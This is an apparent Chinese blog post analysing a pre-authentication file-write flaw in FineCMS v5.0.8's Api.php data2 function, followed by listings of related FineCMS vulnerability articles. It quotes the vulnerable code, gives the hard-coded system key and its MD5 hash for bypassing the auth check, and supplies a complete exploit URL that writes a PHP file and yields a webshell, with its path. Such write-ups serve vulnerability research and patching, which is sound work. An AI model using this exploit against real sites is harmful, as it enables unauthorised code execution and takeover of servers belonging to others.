finecms aip.php漏洞,finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell

最新推荐文章于 2024-07-17 17:25:50 发布
最新推荐文章于 2024-07-17 17:25:50 发布
阅读量287 收藏
点赞数
文章标签: finecms aip.php漏洞

漏洞在C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php中的data2函数,大约在第115行,有问题的代码大约在178行

```

public function data2() {

$data = array();

// 来路认证

if (defined('SYS_REFERER') && strlen(SYS_REFERER)) {

$http = $_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : $_GET['http_referer'];

if (empty($http)) {

$data = array('msg' => '来路认证失败(NULL)', 'code' => 0);

} elseif (strpos($http, SYS_REFERER) === FALSE) {

$data = array('msg' => '来路认证失败(非法请求)', 'code' => 0);

}

}

if (!$data) {

// 安全码认证

$auth = $this->input->get('auth');

if ($auth != md5(SYS_KEY)) {

// 授权认证码不正确

$data = array('msg' => '授权认证码不正确', 'code' => 0);

} else {

// 解析数据

$cache = '';

$param = $this->input->get('param');

if (isset($param['cache']) && $param['cache']) {

$cache = md5(dr_array2string($param));

$data = $this->get_cache_data($cache);

}

if (!$data) {

if ($param == 'login') {

// 登录认证

$code = $this->member_model->login(

$this->input->get('username'),

$this->input->get('password'),

0, 1);

if (is_array($code)) {

$data = array(

'msg' => 'ok',

'code' => 1,

'return' => $this->member_model->get_member($code['uid'])

);

} elseif ($code == -1) {

$data = array('msg' => fc_lang('会员不存在'), 'code' => 0);

} elseif ($code == -2) {

$data = array('msg' => fc_lang('密码不正确'), 'code' => 0);

} elseif ($code == -3) {

$data = array('msg' => fc_lang('Ucenter注册失败'), 'code' => 0);

} elseif ($code == -4) {

$data = array('msg' => fc_lang('Ucenter:会员名称不合法'), 'code' => 0);

}

} elseif ($param == 'update_avatar') {

// 更新头像

$uid = (int)$_REQUEST['uid'];

$file = $_REQUEST['file'];

//

// 创建图片存储文件夹

$dir = SYS_UPLOAD_PATH.'/member/'.$uid.'/';

@dr_dir_delete($dir);

if (!is_dir($dir)) {

dr_mkdirs($dir);

}

$file = str_replace(' ', '+', $file);

if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){

$new_file = $dir.'0x0.'.$result[2];

if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {

$data = array(

'msg' => '目录权限不足或磁盘已满',

'code' => 0

);

} else {

```

其中,首先

```

$file = $_REQUEST['file'];

```

获取$file变量

```

if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){

$new_file = $dir.'0x0.'.$result[2];

if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {

$data = array(

'msg' => '目录权限不足或磁盘已满',

'code' => 0

);

}

```

然后用preg_match函数进行正则匹配,因为$file变量可控,所以$result也是可控的,从而$new_file也是可控的,可以构造为php文件,然后

```

file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file))))

```

对$result[1]进行base64解码,然后写入$new_file文件中。显然,是可以任意写文件进行getshell的。

所以,我们要让程序能够运行到这些代码,不能在之前就退出了

要经过

```

$auth = $this->input->get('auth');

if ($auth != md5(SYS_KEY))

```

SYS_KEY被系统硬编码为24b16fede9a67c9251d3e7c7161c83ac,在C:\phpStudy\WWW\config\system.php中有定义。直接md5加密一次即可绕过

所以最终的payload为

```

http://localhost:88/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

```

无需登录,直接getshell,路径为http://localhost:88/uploadfile/member/0/0x0.php

![](https://images.seebug.org/contribute/b3d641c2-0296-4719-9c14-2f9facf5e3df-w331s)

loading-bars.svg

leniou的牙膏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
awd 线下攻防java防护_2017强网杯线下AWD攻防总结(适合新手)
weixin_29184371的博客
02-26 1367
这篇文章首发于个人博客https://iewoaix8736.github.io/鉴于刚建立博客,比较少人看,所以在t00ls分享给大家,欢迎来交流前言:本菜为高校组,这篇文章适合新手学习参考(dalao飘过,不喜勿喷)AWD攻击这次线下攻防用的是一个Finecms,版本是5.0.9的之前对这个cms并不了解现在复现一下,从哪里跌倒,就从哪里爬起来。朋友给我看了他审计的一片文章http://www...
finecms aip.php漏洞,代码审计| FineCMS的GetShell姿势
weixin_42311115的博客
03-11 409
0x00 背景上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。0x01 审计过程0x00 相关环境源码信息:FineCMS v5.3.0 bulid 20180206问题文件: \finecms\finecms\system\cor...
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9358
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1843
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
finecms-XSS(cve-2017-11629)
m0_65150886的博客
01-08 875
dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。借此漏洞,攻击者可以窃取用户Cookie;2.对输入和URL参数进行过滤(白名单和黑名单)1.访问http://ip:port,进入首页。
Finecms SQL注入漏洞 (CVE-2018-6893)
m0_65150886的博客
01-08 941
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;服务器被远程控制,被安装后门。Finecms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。1.访问http://ip:port,出现如下页面,开始实验。
finecms5.4.zip
11-20
【标题】"FineCMS5.4.zip" 是一个包含了FineCMS 5.4版本核心文件的压缩包。FineCMS是一款基于PHP开发的内容管理系统,以开源、免费和易用性著称,适合中小企业和个人站长用于快速搭建网站。这个版本可能是该系统的一...
基于PHPFineCMS for 海豚 网站内容管理系统.zip
07-20
【标题】"基于PHPFineCMS for 海豚 网站内容管理系统"指的是一个专为海豚(Dolphin)平台设计的网站内容管理系统,它利用PHP编程语言进行开发。PHP是一种广泛使用的开源服务器端脚本语言,尤其在构建动态网站时...
基于PHPfinecms的html5蓝色企业网站模板源码.zip
08-26
PHPFineCMS简介】 PHP是一种广泛使用的开源脚本语言,尤其在Web开发领域中有着广泛应用。它具有语法简洁、跨平台、可扩展性强的特点,能够高效地处理动态网页内容。PHP可以与多种数据库系统(如MySQL、...
基于PHPFineCMS中小型内容管理系统公益版源码.zip
08-26
PHP FineCMS中小型内容管理系统公益版源码解析】 FineCMS是一款专为中小型网站设计的开源内容管理系统,基于PHP编程语言,具有轻量级、高效、易用的特点。它旨在简化网站开发过程,让非专业程序员也能快速搭建和...
FineCMS公益版整合2.2和5.0.8
07-06
最新的整合版本,2系列的最终版是2.2
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
FineCMS v5.0.10
11-29
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定
最新版完全开源免费好用的FineCMS
11-09
FineCMS免费版是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案,适用于小型站点、企业级网站、新闻内容网站等,个人站长及中小企业的首选建站系统。
基于PHPfinecms的html5蓝色企业网站模板.zip
07-20
PHPFineCMS简介】 PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,主要应用于Web开发,可以嵌入到HTML中使用。它的语法简单易懂,灵活性高,支持多种数据库,使得PHP成为搭建网站的理想选择。...
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1457
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
finecms XSS (CVE-2017-11629)
最新发布
qq_23003811的博客
07-17 221
Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。dayrui FineCms 5.0.10及之前的版本。四、漏洞复现(怎么拿flag)?
finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3685
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 555
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
finecms逻辑漏洞
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下是FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值